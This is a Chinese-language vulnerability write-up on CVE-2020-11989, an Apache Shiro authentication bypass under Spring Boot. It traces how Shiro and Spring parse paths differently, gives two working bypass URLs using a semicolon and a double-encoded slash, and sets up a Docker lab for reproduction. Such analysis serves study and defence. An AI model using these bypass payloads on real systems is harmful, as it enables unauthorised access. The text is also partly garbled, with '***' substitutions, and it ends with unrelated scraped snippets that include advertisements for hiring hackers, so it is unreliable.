完成漏洞挖掘条件分析、漏洞复现。
Apache Shiro作为Java框架,可被用于身份认证、授权等任务。
整合Apache Shiro至Spring Boot中时,请求可能会导致越权绕过身份验证现象的出现,存在两种较好的利用现象,称为利用 *** 1和利用 *** 2。
存在安全缺陷的版本:Apache Shiro 1.5.3以前的版本。JDK:1.8.0_181。
应清晰Spring Boot、Apache Shiro框架源码的逻辑功能。
清晰常见的反过滤、非常规字符的特点。
设置Tomcat根目录为“/test/”【仅Apache Shiro 1.5.2有此严格限制】,端口为8088;设置“https://www.freebuf.com/articles/network/admin/*”路径需要认证访问,成功则显示“hello, admin page”,具体配置见源代码 (https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code/tree/main/springboot-shiro-master0)。
绕过认证访问“https://www.freebuf.com/articles/network/admin/*”路径。
对于输入的恶意URL“http://localhost:8088/;/test/admin/page”,首先采用Shiro进行权限验证处理。Shiro框架的decodeAndCleanUriString *** 会根据“;”截取URI“/;/test//admin/page”的前部分内容,从而使得此请求通过权限验证。依次经过的重要类、 *** 如下:
类+ *** | 关键内容 |
org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain | - |
org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getPathWithinApplication | String contextPath=getContextPath(request); ? 【=”/;/test”】 #输出内容作为Shiro的权限验证输入值 if ? (StringUtils.startsWithIgnoreCase(requestUri, contextPath)) { // Normal case: URI contains ? context path. String path=? requestUri.substring(contextPath.length()); return (StringUtils.hasText(path) ? ? path : "/"); } else { // Special case: rather unusual. return requestUri; } |
org.apache.shiro.web.util.WebUtils#getRequestUri | uri=? valueOrEmpty(request.getContextPath()) + "/" +? ? valueOrEmpty(request.getServletPath()) +? ? valueOrEmpty(request.getPathInfo());【=”/;/test//admin/page”】 return ? normalize(decodeAndCleanUriString(request, uri)); |
org.apache.shiro.web.util.WebUtils#decodeAndCleanUriString | int semicolonIndex=uri.indexOf(';'); |
随后,在Spring框架中解析URL。关键点是在解码过程中,仅剔除URI中“;”而保全其他所有内容,从而解析得目标路径“/admin/page”。依次经过的重要类、 *** 如下:
类+ *** | 关键内容 |
org.springframework.web.util.UrlPathHelper#getPathWithinServletMapping | String pathWithinApp=? getPathWithinApplication(request); String servletPath=? getServletPath(request); return servletPath; |
org.springframework.web.util.UrlPathHelper#getPathWithinApplication | String contextPath=? getContextPath(request); 【=”/;/test”】 String requestUri=? getRequestUri(request); return requestUri; |
org.springframework.web.util.UrlPathHelper#getRequestUri | String uri=(String) ? request.getAttribute(WebUtils.INCLUDE_REQUEST_URI_ATTRIBUTE); 【=”/;/test/admin/page”】 return decodeAndCleanUriString(request, ? uri); |
org.springframework.web.util.UrlPathHelper#decodeAndCleanUriString | uri=removeSemicolonContent(uri); 【="http://test/admin/ page"】 uri=decodeRequestString(request, uri); 【=" / /test/ admin / page”】 uri=getSanitizedPath(uri); 【=" / /test/ admin/ page”】 return uri; |
org.springframework.web.util.UrlPathHelper#getServletPath | String servletPath=(String) ? request.getAttribute(WebUtils.INCLUDE_SERVLET_PATH_ATTRIBUTE); 【=”/admin/page”】 return servletPath; 【=”/admin/page”】 |
设置Tomcat根目录为“/test/”【仅Apache Shiro 1.5.2有此严格限制】,端口为8081;设置“https://www.freebuf.com/articles/network/admin/*”路径需要认证访问,成功则显示“hello,admin”,具体配置见源代码 (https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code/tree/main/springboot-shiro-master)。
绕过认证访问“https://www.freebuf.com/articles/network/admin/{name}”路径。
对于输入的恶意URL“http://localhost:8081/test/admin/a%25%32%66a”,首先采用Shiro进行权限验证处理。Shiro框架的decodeRequestString *** 会进行两次解码得到URI“/admin/a/a”,并因其分割后的数组长度大于模板“/admin/*”而使得此请求通过权限验证。依次经过的重要类、 *** 如下:
类+ *** | 关键内容 |
org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain | String requestURI=? getPathWithinApplication(request); if (pathMatches(pathPattern, requestURI)) ? {…… return null; |
org.apache.shiro.web.util.WebUtils#getPathWithinApplication | String contextPath=? getContextPath(request); 【=”/test”】 String requestUri=? getRequestUri(request); |
org.apache.shiro.web.util.WebUtils#getRequestUri | uri=? valueOrEmpty(request.getContextPath()) + "/" ? +valueOrEmpty(request.getServletPath()) +valueOrEmpty(request.getPathInfo()); ? 【=" /test/ / admin/a%2fa "】 return ? normalize(decodeAndCleanUriString(request, uri)); |
org.apache.shiro.web.util.WebUtils#decodeAndCleanUriString | uri=decodeRequestString(request, uri); return (semicolonIndex !=-1 ? ? uri.substring(0, semicolonIndex) : uri); |
org.apache.shiro.web.util.WebUtils#decodeRequestString | return URLDecoder.decode(source, enc); |
java.net.URLDecoder#decode(java.lang.String, ? java.lang.String) | #可解码“%2f”为“/” while (i < numChars) { c=s.charAt(i); switch (c) { case '+': *** .append(' '); i++; needToChange=true; break; case '%':………… return (needToChange? *** .toString() : s); ? 【=”/test//admin/a/a”】 |
org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#pathMatches | return pathMatcher.matches(pattern, ? path); 【pattern : " / admin/*",source: " / admin/ a / a "】 |
org.apache.shiro.util.PatternMatcher#matches | return match(pattern, source); |
org.apache.shiro.util.AntPathMatcher#doMatch | #判断得模板长度短于URI长度,说明URI和当前模板不属于同一类。 if (pathIdxStart > pathIdxEnd) { // Path is exhausted, only match ? if rest of pattern is * or **'s …… } else if (pattIdxStart > pattIdxEnd) ? { // String not exhausted, but ? pattern is. Failure. return false; |
随后,在Spring框架中解析URL。关键点是在解码过程中,仅解码得路径是“/test/admin/a%252f”,因此符合“/admin/{name}”规则得以正常访问。依次经过的重要类、 *** 如下:
类+ *** | 关键内容 |
javax.servlet.Servlet#service | - |
javax.servlet.http.HttpServlet#doGet | - |
如下图,修改了org.apache.shiro.web.util.WebUtils#getPathWithinApplication,采用两个标准 *** 获取URI有效应对了“/;/…”安全缺陷,且无解码操作从而有效应对了“a%25%32%66a”安全缺陷。
加载容器tar为镜像的例子:
cat https://www.freebuf.com/articles/network/ubuntu-xxx.tar | docker import - ubuntu-new
设置局域网及容器ip、启动容器的例子:
(1)自定义 ***
docker network create --subnet=192.168.10.1/24 testnet
(2)启动docker容器
docker run -p 8088:8088 -p 8081:8081 -it --name testt3 --hostname testt3 --network testnet --ip 10.10.10.100 ubuntuxxx:xxx /bin/bash
镜像名称为ubuntu_cve-2020-11989:v1,需开启8088和8081的端口映射功能。
启动进入容器后,复现利用 *** 1。切换到目录【/springboot-shiro-master0/target】下,执行命令【java -jar srpingboot-shiro-0.0.1-SNAPSHOT.jar】。随后在宿主机浏览器输入【http://localhost:8088/;/test/admin/page】,成功访问表明复现成功,如下图。
复现利用 *** 2。中断当前程序,切换到目录【/springboot-shiro-master1/target】下,执行命令【java -jar srpingboot-shiro-0.0.1-SNAPSHOT.jar】。随后在宿主机浏览器输入【http://localhost:8081/test/admin/a%25%32%66a】,成功访问表明复现成功,如下图。
https://www.freebuf.com/vuls/249380.html
https://xlab.tencent.com/cn/2020/06/30/xlab-20-002/
idea 快速创建spring boot项目 以及打包 - 知乎
https://zhuanlan.zhihu.com/p/149736921
新零售的开始,线下店开始了新机遇! 之前一直讲虚实结合一直没人听,马云喊了一句“新零售”。市场风险瞬间从线上跑到了线下!互联网纷纷开始了自己的全国扩张,要不“单点加盟”要不“城市合伙人”。互联网公司...
咱们能够必定成果和http://www.target.com/page.php?id=1 和1=1的成果相似。 2、点左下角的”Hosts”->”Scan MAC Addresses”,取得本网...
联系黑客接单,许多人都不晓得,所以碰到了第三方的渠道保护疑问,如非常注册、体系晋级、端口保护、套期保值的质疑、体系主动搜检审计、违规、银行体系保护等,每个月都要搜检几片面举行审计。在这里,咱们不干脆提...
十一国庆,既是大家出去旅游的节日,也是我们伟大的祖国母亲的生日,是庆祝新中国成立的日子,每当到这种日子,我们的爱国之情就油然而生。下面,小编就给大家分享一些国庆爱国的句子,国庆爱国说说,十一国庆爱国语...
打开dedecms的网站首页,在顶部我们会看到“织梦CMS – 轻松建站从此开始!”这样的一句话,这显然不是我们所需要的。对于“织梦CMS – 轻松建站从此开始!”这句话,我们可以直接把它删除,也可以...
网上的专业寻人找人黑客靠谱吗,谁有信誉的黑客联系方式呢,为了找到失踪一个月的男友,10日中午,一个绝望的23岁的zhou州女孩王萍在网上搜索了“如何找到人”。在百度贴吧中的回复使她眼前一亮:“加QQ:...